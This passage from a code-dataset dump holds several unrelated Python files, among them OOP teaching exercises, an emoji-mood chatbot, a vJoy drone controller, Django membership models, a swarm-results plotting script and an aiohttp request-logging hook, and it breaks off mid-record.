def author(self):\n return author\n\n\nclass AudioBook(Book):\n\n def __init__(self, title, author, speaker, gender) -> None:\n super().__init__(title, author)\n self.speaker = speaker\n self.gender = gender\n\n def speak(self):\n print(f\"下面请收听演说者{self.speaker},{self.gender},演说:{self.author}的作品<<{self.title}>>。\")\n\n\na1 = AudioBook(\"老人与海\", \"欧内斯特·米勒尔·海明威\", \"张三\", \"男\")\n\n\n# a1.speak()\n# 3、以点(Point)类为基类,重新定义矩形类和圆类Rectangle class and circle class。点为直角坐标点,矩形水平放置,由左下方的顶点和长宽定义。\n# 圆由圆心和半径定义。派生类操作判断任一坐标点是在图形内,还是在图形的边缘上,还是在图形外。缺省初始化图形退化为点。\n# 要求包括拷贝初始化方法。编程测试类设计是否正确。\n#\nclass Point:\n\n def __init__(self, x, y) -> None:\n super().__init__()\n self.x = x\n self.y = y\n\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, value):\n if type(eval(str(value))) == int:\n self.__x = int(value)\n elif type(eval(str(value))) == float:\n self.__x = float(value)\n else:\n print(\"格式错误,无法画图!\")\n pass\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, value):\n if type(eval(str(value))) == int:\n self.__y = int(value)\n elif type(eval(str(value))) == float:\n self.__y = float(value)\n else:\n print(\"格式错误,无法画图!\")\n pass\n\n\nclass Rectangle(Point):\n\n def __init__(self, x, y, length, width) -> None:\n super().__init__(x, y)\n self.length = length\n self.width = width\n\n @property\n def length(self):\n return self.__length\n\n @length.setter\n def length(self, value):\n if type(eval(str(value))) == int:\n self.__length = int(value)\n elif type(eval(str(value))) == float:\n self.__length = float(value)\n else:\n print(\"格式错误,无法画出矩形!\")\n pass\n\n @property\n def width(self):\n return self.__width\n\n @width.setter\n def width(self, value):\n if type(eval(str(value))) == int:\n self.__width = int(value)\n elif type(eval(str(value))) == float:\n self.__width = float(value)\n else:\n print(\"格式错误,无法画出矩形!\")\n pass\n\n def judge(self, r_x, r_y):\n j1 = r_x - self.x\n j2 = r_y - self.y\n j3 = self.width+self.y - r_y\n j4 = self.length+self.x - r_x\n if min(j1,j2,j3,j4)==0:\n print(\"在矩形上\")\n elif max(j1,j2,j3,j4) < self.length and max(j1,j2,j3,j4) < self.width:\n print(\"在矩形内\")\n else:\n print(\"在矩形外\")\n\nclass Circle(Point):\n\n def __init__(self, x, y,r) -> None:\n super().__init__(x, y)\n self.r = r\n @property\n def r(self):\n return self.__r\n\n @r.setter\n def r(self, value):\n if type(eval(str(value))) == int:\n self.__r = int(value)\n elif type(eval(str(value))) == float:\n self.__r = float(value)\n else:\n print(\"格式错误,无法画出圆!\")\n pass\n def judge(self, r_x, r_y):\n\n if (r_x - self.x) ** 2 + (r_y - self.y) ** 2 == self.r**2:\n print(\"在圆上\")\n elif (r_x - self.x) ** 2 + (r_y - self.y) ** 2 < self.r**2:\n print(\"在圆内\")\n else:\n print(\"在圆外\")\n\n# c1 = Circle(0,0,2)\n# c1.judge(2,1)\n# r1 = Rectangle(0,0,3,4)\n# r1.judge(3,1)\n# 4、对平面形体有长和面积,周长、面积应怎样计算(用什么方法)?要求实现运行时的多态性。请编程,并测试。\n# Shape\n# 正方形(Square) 长方形(Rectangle) 圆形(Circle) 圆环(Annulus)\n#\nimport math\n\n\nclass Shape:\n def __init__(self, name) -> None:\n super().__init__()\n self.name = name\n\n def perimeter(self):\n pass\n\n\nclass Square(Shape):\n\n def __init__(self, name, length, area) -> None:\n super().__init__(name)\n self.length = length\n self.area = area\n\n def perimeter(self):\n w = self.area / self.length\n perimeter = 2 * (w + self.length)\n print(f\"{self.name}的周长是{perimeter}\")\n\n\nclass Rectangle(Square):\n pass\n\n\nclass Circle(Shape):\n\n def __init__(self, name, length, area) -> None:\n super().__init__(name)\n self.length = length\n self.area = area\n\n def perimeter(self):\n perimeter = 2 * self.length * math.pi\n print(f\"{self.name}的周长是{perimeter}\")\n\nclass Annulus(Circle):\n\n def perimeter(self):\n perimeter = 2 * (self.area /self.length )\n print(f\"{self.name}的周长是{perimeter}\")\n\n\nclass Count:\n def change(self, shape: Shape):\n print(f\"切换图形到{shape.name}\")\n shape.perimeter()\n\ns1 = Count()\ns1.change(Rectangle(\"正方形\",2,4))\n\n\n# 5、某公司雇员(Employee)包括经理(Manager),技术人员(Technician)和销售员(Salesman)。以Employee类为基类派生出Manager,Technician和Salesman类;Employee类的属性包括姓名、职工号、工资级别,月薪(实发基本工资加业绩工资)。操作包括月薪计算方法(pay()),该方法要求输入请假天数,扣去应扣工资后,得出实发基本工资。\n# Technician类派生的属性有每小时附加酬金和当月工作时数,及研究完成进度系数。业绩工资为三者之积。也包括同名的pay()方法,工资总额为基本工资加业绩工资。\n# Salesman类派生的属性有当月销售额和酬金提取百分比,业绩工资为两者之积。也包括同名的pay()方法,工资总额为基本工资加业绩工资。\n# Manager类派生属性有固定奖金额和业绩系数,业绩工资为两者之积。工资总额也为基本工资加业绩工资。编程实现工资管理。","repo_name":"1987617587/lsh_py","sub_path":"basics/day10/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4091368349","text":"'''\nCreated on 2013. 1. 23.\n\n@author: stmkmk\n'''\nimport time\n\nstart = time.time()\n\nfor i in range(10):\n for j in range(100):\n print('[%s] => %s' %(i,j))\n \nprint('Elapsed time :%s' %(time.time() - start)) ","repo_name":"gramman75/programming_python","sub_path":"book/chapter02/not-thread-class.py","file_name":"not-thread-class.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22179105775","text":"import numpy\nemojis_0_face_smiling = ['😀','😃','😄','😁','😆','😂','🙂','🤩','🥳'] #=)\nemojis_1_face_concerned =['😫','😩','😓','☹','🙁','😟','😞','😣','😖'] #=(\nemojis_2_face_negative = ['👿','😬','😤','😡','👺','💀','😠','🤯','🤨'] #=\\\n\nhello_messages = ['Привет! Отличное натроение!', \"Привет, не грусти!\", \"Привет, хватит злиться! я не виноват!!!\"]\n\ndef choise_emoji(emj):\n if emj in emojis_0_face_smiling:\n return 0\n elif emj in emojis_1_face_concerned:\n return 1\n elif emj in emojis_2_face_negative:\n return 2\n else:\n return 3\n\ntype_messages = {\n '00':['Радуюсь вместе с тобой)',\n \"Ты в отличном настроении!\",\n \"Ты такой счастливый.\",\n \"Отличный день!\",\n \"С тобой приятно общаться\",\n \"Ты на позитиве!\",\n \"Тебе так весело)\"],\n '01': ['Что произошло?',\n \"Тебе стало грустно, я попытаюсь поднять тебе настроение!\\nЩа анекдот расскажу!\\nЖена: У вас, у мужиков, на уме только секс, а нам, женщинам, нужно внимание…\\nMуж: Внимание!!! Сейчас будет секс!\",\n \"Ты расстроился... я вместе с тобой(\",\n \"Тебя что-то расстроило...\",\n \"ээээээ, не грусти! надеюсь, это не я тебя расстроил 😞\"],\n '02': [\"это я тебя разозлил?! Я же ничего не сделааааал!\",\n \"Не злись.... все же было хорошо\",\n \"Ща пошучу...\\nУчитель физики: - Вова, назови мне вещество, которое переходит из твердого состояния в газообразное, минуя жидкую фазу.\\n- Вячеслав Иванович, это горох!\"],\n '10': [\"ты в хорошем настоении! Я рад)\",\n \"Твое настроение улучшилось!\",\n \"я радуюсь вместе с тобой)\"],\n '11': [\"Может анекдот тебе поможет. Папа научил маленького Вовочку считать, теперь папе приходится делить пельмени поровну.\",\n \"Ты серьезно расстроен\",\n \"Ну хватит грустить!!!\"],\n '12': [\"Какая быстрая смена настрения... я вас, кожанных, не понимаю!\",\n \"Я не хотел тебя злить!\",\n \"Прости, если это я тебя разозлил =(\"],\n '20': [\"Ты повеселел.\",\n \"Тебе стало лучше)\"],\n '21': [\"Теперь ты грустишь...\",\n \"Люди.... вас не возможно понять, откуда столько эмоций?!\",\n \"Может я смогу исправить твое настроение...В школе Васю все боялись и уважали, все знали, что он занимается карате.\\n В школу пришел новенький и побил Васю, он не знал, что Вася занимается карате.\"],\n '22': [\"Ну ты и злюка\",\n \"Прекращай злиться\",\n \"я не собирался портить тебе настроение =(\",\n \"Может я смогу исправить твое настроение...В школе Васю все боялись и уважали, все знали, что он занимается карате.\\n В школу пришел новенький и побил Васю, он не знал, что Вася занимается карате.\"]\n}\n\n\ndef unknown_message():\n return \"Я тебя не понимаю\\nБеседа обнуляется\"\n\ndef choise_text(emj,Bot,last=''):\n if last != '':\n id = choise_emoji(emj)\n if id == 3:\n Bot.last=''\n return unknown_message()\n else:\n Bot.last = str(id)\n return numpy.random.choice(type_messages[last+str(id)], size=1)[0]\n else:\n id =choise_emoji(emj)\n if id == 3:\n Bot.last = ''\n return unknown_message()\n else:\n Bot.last = str(id)\n return hello_messages[id]\n","repo_name":"KseniiaKarpova/chatBot_testTask","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40062058995","text":"import warnings\n\nPYVJOY_IMPORT_SUCCESSFUL = False\nPYNPUT_IMPORT_SUCCESSFUL = False\n\ntry:\n import pyvjoy\n\n PYVJOY_IMPORT_SUCCESSFUL = True\n from pynput.keyboard import Key, Listener\n\n PYNPUT_IMPORT_SUCCESSFUL = True\nexcept ModuleNotFoundError:\n warnings.warn(F\"Not all virtual_controller modules were imported correctly.\"\n F\" pyvjoy: {PYVJOY_IMPORT_SUCCESSFUL}. pynput: {PYNPUT_IMPORT_SUCCESSFUL}\"\n F\"\\nPlease install the modules to use virtual_controller.\")\n\nVJOY_INSTALLED = True\n\n\ndef vjoy_accessible():\n global VJOY_INSTALLED, PYVJOY_IMPORT_SUCCESSFUL\n return VJOY_INSTALLED and PYVJOY_IMPORT_SUCCESSFUL\n\n\ndef pynput_vjoy_accessible():\n global PYNPUT_IMPORT_SUCCESSFUL\n return PYNPUT_IMPORT_SUCCESSFUL and vjoy_accessible()\n\n\nVJOY_VALUE = 1\n\n\nclass VirtualController:\n run_listeners: bool\n listener_closed: bool\n\n def __init__(self, fix_airsim: bool = True, keyboard_listeners: bool = True):\n \"\"\"\n\n \"\"\"\n self.listener_thread = None\n global VJOY_INSTALLED\n self.keyboard_listeners = keyboard_listeners\n if not vjoy_accessible():\n return\n self.fix_airsim = fix_airsim\n try:\n self.j = pyvjoy.VJoyDevice(1)\n VJOY_INSTALLED = True\n except pyvjoy.vJoyException:\n VJOY_INSTALLED = False\n self.run_listeners = keyboard_listeners\n self.listener_closed = False\n\n self.listener_active = False\n self.listener: Listener = Listener(\n on_press=self.on_press,\n on_release=self.on_release)\n\n def on_press(self, key):\n if not self.listener_active:\n return\n\n if str(key) == 'Key.right':\n self.move_right(VJOY_VALUE)\n if str(key) == 'Key.left':\n self.move_right(-VJOY_VALUE)\n if str(key) == 'Key.up':\n self.move_forward(VJOY_VALUE)\n if str(key) == 'Key.down':\n self.move_forward(-VJOY_VALUE)\n\n if str(key) == \"'d'\":\n self.clockwise(VJOY_VALUE)\n if str(key) == \"'a'\":\n self.clockwise(-VJOY_VALUE)\n if str(key) == \"'w'\":\n self.throttle(VJOY_VALUE)\n if str(key) == \"'s'\":\n self.throttle(-VJOY_VALUE)\n\n if not self.run_listeners:\n self.reset()\n return False\n\n def on_release(self, key):\n if not self.listener_active:\n return\n\n if str(key) == 'Key.right' or str(key) == 'Key.left':\n self.move_right(0)\n if str(key) == 'Key.up' or str(key) == 'Key.down':\n self.move_forward(0)\n\n if str(key) == \"'d'\" or str(key) == \"'a'\":\n self.clockwise(0)\n if str(key) == \"'w'\" or str(key) == \"'s'\":\n self.throttle(0)\n\n if key == Key.esc:\n self.reset()\n # Stop listener\n return False\n\n if not self.run_listeners:\n self.reset()\n return False\n\n def enable(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not pynput_vjoy_accessible():\n return\n\n self.listener_active = True\n\n def disable(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not pynput_vjoy_accessible():\n return\n\n self.listener_active = False\n\n self.reset()\n\n def throttle(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_Y, self._get_val(-val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_X, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def clockwise(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_X, self._get_val(val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_Y, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def move_right(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return: wAxisVBRX\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_RX, self._get_val(val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RX, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def move_forward(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_RY, self._get_val(-val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RY, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def update(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n # self.j.update()\n\n def reset(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n\n self.move_forward(0)\n self.move_right(0)\n self.throttle(0)\n self.clockwise(0)\n\n @staticmethod\n def _get_val(val):\n return int(val * 0x4000) + 0x4000\n\n def __enter__(self) -> \"VirtualController\":\n \"\"\"\n\n :return:\n \"\"\"\n self.listener.start()\n return self\n\n def __exit__(self, *args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n self.listener.stop()\n\n\nif __name__ == \"__main__\":\n cont = VirtualController()\n cont.enable()\n input()\n cont.disable()\n cont.throttle(1)\n cont.clockwise(1)\n cont.move_right(1)\n cont.move_forward(1)\n input()\n cont.throttle(-1)\n cont.clockwise(-1)\n cont.move_right(-1)\n cont.move_forward(-1)\n input()\n","repo_name":"Asif-Rot/Robotics_ex1","sub_path":"simple_airsim/api/virtual_controller.py","file_name":"virtual_controller.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70094087289","text":"from my_modules.riddle_game_3 import create_riddles_dictionary, guess_riddle, add_result, print_results\n\n\n''' Задание_6\nДобавьте в модуль с загадками функцию, которая принимает на вход строку (текст загадки) и число (номер попытки, с которой она угадана).\n📌Функция формирует словарь с информацией о результатах отгадывания.\n📌Для хранения используйте защищённый словарь уровня модуля.\n📌Отдельно напишите функцию, которая выводит результаты угадывания из защищённого словаря в удобном для чтения виде.\n📌Для формирования результатов используйте генераторное выражение.\n'''\n\n\ndef main():\n riddles = create_riddles_dictionary()\n attempts = 3\n print(f\"Загадки: \\n{riddles.keys()}\")\n print(f'Осталось попыток: {attempts}')\n for riddle, options in riddles.items():\n result = guess_riddle(riddle, options, attempts)\n if result > 0:\n print(f\"Загадка отгадана с {result} попытки.\")\n else:\n print(\"Вы исчерпали все попытки. Попробуйте еще раз!\")\n add_result(riddle, result)\n print_results()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"m1644/Seminar_06","sub_path":"Seminar/sem_06.py","file_name":"sem_06.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574084397","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input().strip())\r\n\r\narr = list(map(int,input().split()))\r\nfor i,v in enumerate(arr):\r\n arr[i] = [v,i + 1]\r\nx = 0\r\nanswer = []\r\n\r\nwhile True:\r\n t = arr.pop(x)\r\n answer.append(t[1])\r\n if len(arr) == 0:\r\n break\r\n if t[0] > 0:\r\n t[0] -= 1\r\n x = (x + t[0]) % len(arr)\r\n\r\n\r\n\r\n\r\nprint(*answer)\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/2346. 풍선 터뜨리기/풍선 터뜨리기.py","file_name":"풍선 터뜨리기.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25433096548","text":"#@title A2/DSU_Login {display-mode: \"form\"}\n#Last Edit: 2020/11/27\nfrom a1 import *\nfrom a4 import * #NaClProfile\n\n#@title Other Mod {display-mode: \"form\"}\ndef joinmsg(username, pwd):\n msg = '{\"join\": {\"username\":\"'+username+'\", \"password\":\"'+pwd+'\"}}'\n return msg\n\ndef biomsg(msg):\n msg = '{\"bio\": {\"entry\":\"'+msg+'\", \"timestamp\":\"'+str(time.time())+'\"}}'\n return msg\n\ndef postmsg(msg):\n msg = '{\"post\": {\"entry\":\"'+msg+'\", \"timestamp\":\"'+str(time.time())+'\"}}'\n return msg\n\n\ndef Log_In(uri,parent_address,prof):\n print(\"[LogIn Interface]\")\n while True:\n cmd = input(\"\"\"\n Press [X] to execute the corresponding commands \n -[C]reate an Account\n -[L]oad an pre-existing DSU file to LogIn\n -[Q]uit to quit the program\n \"\"\")\n if cmd == \"C\":\n User_Name = input(\"User Name:\")\n temp = \"\"\n for i in User_Name.split(\" \"):\n temp += i + \"_\"\n User_Name = temp[0:-1]\n check_existance = 'L ' + parent_address + ' -r -s ' + \"{}_user_file.dsu\".format(User_Name)\n if File_Exp(check_existance,RETURN=True) != [] :\n print(\"ERROR! Name already token, please register with another name!\")\n continue\n else:\n pass # Name avaliable\n prof = NaClProfile(uri,User_Name)\n prof.bio = input(\"Leave a Bio!Tell us more about yourself!\")\n try:\n file_name = \"{}_user_file\".format(User_Name)\n entry = \"C {} -n {}\".format(parent_address,file_name)\n file_path = File_Exp(entry,RETURN= True)\n print(\"file_path:\",file_path)\n prof.save_profile(file_path) #Dump the information into the file\n except:\n print(\"Error,fail to create account\")\n elif cmd == \"L\":\n User_Name = input(\"Please Enter Your Account Name\")\n temp = \"\"\n for i in User_Name.split(\" \"):\n temp += i + \"_\"\n User_Name = temp[0:-1]\n file_name = User_Name + \"_user_file.dsu\"\n entry = 'L ' + parent_address + ' -r -s ' + file_name\n try:\n file_path = File_Exp(entry,True)[0]\n except IndexError:\n print(\"Error,file not found.\")\n continue\n prof.load_profile(file_path)\n message = joinmsg(prof.private_key,prof.public_key)\n print(prof.get_posts())\n print(\"Welcome!!!\")\n return message, file_path, prof\n elif cmd == \"Q\":\n return (\"QUIT\",\"QUIT\",prof)\n else:\n print(\"Please LogIn First!\")\n","repo_name":"Ryan47Liao/Distributive-Social-Communication-Platform","sub_path":"dsu_login.py","file_name":"dsu_login.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74070128888","text":"from django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, pre_save\nfrom django.db.utils import DatabaseError\nfrom django.db.models import Q\nfrom django.utils.functional import cached_property\nfrom common.models import BaseModel\n\n\nclass UserProfile(BaseModel):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, related_name=\"profile\"\n )\n profession = models.CharField(\n help_text=\"What do you do?\",\n max_length=200,\n default=\"I work/study at ...\"\n )\n about = models.TextField(\n help_text=\"Few lines about yourself\",\n default=\"I like ...\"\n )\n github_url = models.URLField(blank=True, null=True)\n bitbucket_url = models.URLField(blank=True, null=True)\n twitter_url = models.URLField(blank=True, null=True)\n learned_about_pssi = models.TextField(\n \"How did you come to know about PSSI?\",\n default=\"I came to know about PSSI from ...\"\n )\n\n def __str__(self):\n return self.user.get_full_name()\n\n @cached_property\n def is_pssi_member(self):\n now = timezone.now()\n return self.membership_history.filter(\n from_date__lte=now,\n to_date__gte=now,\n ).count() > 0\n\n\nclass MembershipApplication(BaseModel):\n APPLICATION_STATUS_CHOICES = (\n ('u', 'Under Review'),\n ('a', 'Approved'),\n ('r', 'Rejected'),\n )\n\n profile = models.OneToOneField(\n 'UserProfile'\n )\n status = models.CharField(\n \"Membership Application Status\", max_length=1,\n choices=APPLICATION_STATUS_CHOICES, default='u'\n )\n\n def __str__(self):\n return \"<{} of {}, status: {}>\".format(self.__class__.__name__,\n self.profile,\n self.get_status_display())\n\n\nclass Membership(BaseModel):\n PAYMENT_METHOD_CHOICES = (\n ('on', 'Online'),\n ('off', 'Offline'),\n )\n\n profile = models.ForeignKey(\n 'UserProfile', related_name=\"membership_history\"\n )\n from_date = models.DateField()\n to_date = models.DateField()\n payment = models.ForeignKey('payments.Payment', blank=True, null=True)\n payment_method = models.CharField(\n max_length=3, choices=PAYMENT_METHOD_CHOICES, default='on'\n )\n\n def __str__(self):\n return \"{user}, {frm} to {to}\".format(\n user=self.profile.user.username,\n frm=self.from_date,\n to=self.to_date\n )\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, **kwargs):\n if kwargs['created'] is True:\n try:\n UserProfile.objects.create(user_id=kwargs['instance'].id)\n except DatabaseError:\n pass\n","repo_name":"pythonindia/pssi.org.in","sub_path":"apps/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"30339782977","text":"import os, sys\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nfrom siphon_utils import *\n\nSHOW = False\n\nDIR = os.path.dirname(os.path.join(os.getcwd(), os.path.dirname(sys.argv[0])))\nCHAIN_DIR = os.path.join(DIR, 'chain_siphon')\nALL = []\nRT = 'output'\nROOT = os.path.join(CHAIN_DIR, RT)\n\nCONF_INT = -1 # either the percent confidence interval, or negative number for # of stdev to show\nEXCLUDED = [\n # 'max',\n # 'control',\n # 'chain',\n # 'LJP',\n 'leader',\n]\n\nname_mapping = {'chain': 'Chain Siphon',\n 'control': 'Control',\n 'LJP': 'LJP',\n 'leader': 'Leader',\n 'max': 'Theoretical Max'}\n\nOUTPUT_DIR = os.path.join(ROOT, 'plots')\n\nVALUES = range(1, 31)\nROUND = 1\nCARE = -1 # use numbers in linear reg if >CARE\n\nfor (plotting, PROP) in (('failed', False), ('failed', True), ('successful', False), ('successful', True)):\n print(\"plotting \" + plotting + ' blimps, proportion is', PROP)\n legend_entries = 0\n labeled_bars = False\n\n if plotting == 'failed':\n plotting = 'failed'\n y_ax = 'stuck'\n else:\n plotting = 'successful'\n y_ax = 'successful'\n\n for folder in os.listdir(ROOT):\n if folder in EXCLUDED:\n continue\n folder_dir = os.path.join(ROOT, folder)\n\n data_dict, data = datadict_from_folder(folder_dir)\n if data_dict is None:\n continue\n\n keys = list(data_dict.keys())\n keys.sort()\n\n values = np.array([data_dict[entry][plotting] for entry in keys])\n if PROP:\n y = values/keys\n else:\n y = values\n var = np.array([data_dict[entry]['var'] for entry in keys])\n trials = np.array([data_dict[entry]['trials'] for entry in keys])\n stdev = np.sqrt(var)\n # VALUES=DATA['num_agents']\n\n label = folder\n if label in name_mapping:\n label = name_mapping[label]\n print(\"\\tplotting:\", label)\n\n plt.plot(keys, y, alpha=1, label=label)\n legend_entries += 1\n # leg.append(folder)\n\n bar_label = None\n if CONF_INT > 0:\n percentile = 1 - (1 - CONF_INT/100)/2\n # since double sided\n\n # 95% confidence interval, subtract 1 from num trials since 1 DOF lost for variance\n conf = (stdev/np.sqrt(trials - 1))*norm.ppf(percentile)\n if PROP:\n conf = conf/keys\n if not labeled_bars:\n labeled_bars = True\n bar_label = str(CONF_INT) + '% conf. int'\n low = np.max((y - conf, [0 for _ in range(len(y))]), axis=0)\n high = np.min((y + conf, [(1 if PROP else i) for i in range(1, 1 + len(y))]), axis=0)\n plt.fill_between(keys, low, high,\n alpha=.35,\n #color='gray', label=bar_label\n )\n if bar_label is not None:\n legend_entries += 1\n ALL.append(y)\n elif CONF_INT < 0:\n conf = stdev*np.abs(CONF_INT)\n if PROP:\n conf = conf/keys\n\n if not labeled_bars:\n labeled_bars = True\n bar_label = '$\\pm' + str(abs(CONF_INT)) + '$ stdev'\n\n low = np.max((y - conf, [0 for _ in range(len(y))]), axis=0)\n high = np.min((y + conf, [(1 if PROP else i) for i in range(1, 1 + len(y))]), axis=0)\n plt.fill_between(keys, low, high,\n alpha=.35,\n #color='gray', label=bar_label\n )\n if bar_label is not None:\n legend_entries += 1\n if False:\n XY = []\n for x, s in zip(keys, values):\n if s > CARE:\n XY.append([x, s])\n else:\n XY = []\n XY = np.array(XY)\n Y = XY[:, [1]]\n X = np.concatenate((np.ones((len(XY), 1)), XY[:, [0]]), axis=1)\n result = np.linalg.lstsq(X, Y, rcond=None)\n b = result[0][0][0]\n m = result[0][1][0]\n\n guess = np.array([[i*m + b] for i in VALUES])\n\n plt.plot(VALUES, guess.reshape(-1)/(np.array(VALUES) if PROP else 1), '--' if folder == \"CHAINS\" else ':',\n alpha=.5, color='purple',\n label=('y = {0}*x' + (' + ' if b > 0 else ' ') + '{1}').format(round(m, ROUND), round(b, ROUND)))\n legend_entries += 1\n if 'max' not in EXCLUDED:\n plt.plot(VALUES, [(1 if PROP else i) for i in VALUES], '--',\n alpha=.5,\n label=name_mapping['max'] if 'max' in name_mapping else 'max'\n )\n legend_entries += 1\n plt.xlabel('Number of agents')\n\n plt.ylabel(('Proportion of ' if PROP else '') + y_ax + ' blimps')\n plt.ylim((0, 1.1 if PROP else plt.ylim()[1]))\n plt.legend( # + leg_fill[0:1],\n # loc=('lower right' if PROP else 'upper left')\n # loc='center right', bbox_to_anchor=(1.2, .5),ncol=3,\n loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=int(np.ceil(legend_entries/2))\n )\n save_file = os.path.join(OUTPUT_DIR, ('prop_' if PROP else '') + y_ax + '_rate.png')\n if not os.path.exists(os.path.dirname(save_file)):\n os.makedirs(os.path.dirname(save_file))\n plt.savefig(save_file)\n if SHOW:\n plt.show()\n plt.close()\n\nfor folder in os.listdir(ROOT):\n if folder in EXCLUDED:\n continue\n folder_dir = os.path.join(ROOT, folder)\n\n data_dict, data = datadict_from_folder(folder_dir)\n if data_dict is None:\n continue\n \n keys = list(data_dict.keys())\n keys.sort()\n\n trials = np.array([data_dict[entry]['trials'] for entry in keys])\n \n label = folder\n if label in name_mapping:\n label = name_mapping[label]\n\n plt.plot(keys, trials, alpha=.5, label=label)\n\nplt.xlabel('Number of agents')\nplt.xlim(0,plt.xlim()[1])\nplt.ylim(0,plt.ylim()[1])\nplt.ylabel('Trials run')\n\nplt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=4)\nsave_file = os.path.join(OUTPUT_DIR, 'trials.png')\nif not os.path.exists(os.path.dirname(save_file)):\n os.makedirs(os.path.dirname(save_file))\nplt.savefig(save_file)\nplt.close()\n","repo_name":"pranavraj575/swarm_coppeliasim","sub_path":"chain_siphon/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33161332121","text":"import textwrap\nfrom asyncio import CancelledError\nfrom types import SimpleNamespace\n\nfrom aiohttp import (\n ClientSession,\n TraceRequestStartParams,\n TraceRequestChunkSentParams,\n TraceRequestEndParams,\n TraceConfig,\n TraceRequestExceptionParams,\n)\n\nfrom zerooo.core.log import LOGGER, formatHeaders\nfrom zerooo.core.options import optDebug\n\ndebug = optDebug.__get__()\n\n\ndef is_printable_content_type(content_type):\n return 'text' in content_type or 'json' in content_type or 'xml' in content_type or 'html' in content_type\n\n\n# hook 请求包\nasync def on_request_start(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestStartParams) -> None:\n trace_config_ctx.method = params.method\n trace_config_ctx.url = params.url\n trace_config_ctx.headers = formatHeaders(params.headers)\n trace_config_ctx.chunk = None\n\n\n# hook post数据\nasync def on_request_chunk_sent(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestChunkSentParams) -> None:\n trace_config_ctx.chunk = params.chunk\n\n\nasync def on_request_end(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestEndParams) -> None:\n if is_printable_content_type(params.response.content_type):\n params.response._text = await params.response.text()\n else:\n params.response._text = params.response.content\n\n reshdrs = formatHeaders(params.response.headers)\n result = textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(trace_config_ctx.chunk, 'utf-8') if trace_config_ctx.chunk else ''}\n---------------- response ----------------\n{params.response.status} {params.response.reason}\nHost: {params.url.host}:{params.url.port}\n{reshdrs}\n\n{params.response._text}\n''')\n LOGGER.debug(result, debug, 'http')\n\n\nasync def on_request_exception(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestExceptionParams) -> None:\n if isinstance(params.exception, CancelledError):\n result = textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(trace_config_ctx.chunk, 'utf-8') if trace_config_ctx.chunk else ''}\n''')\n LOGGER.debug(result, debug, 'http')\n LOGGER.warning(\"Request cancelled\")\n else:\n result = 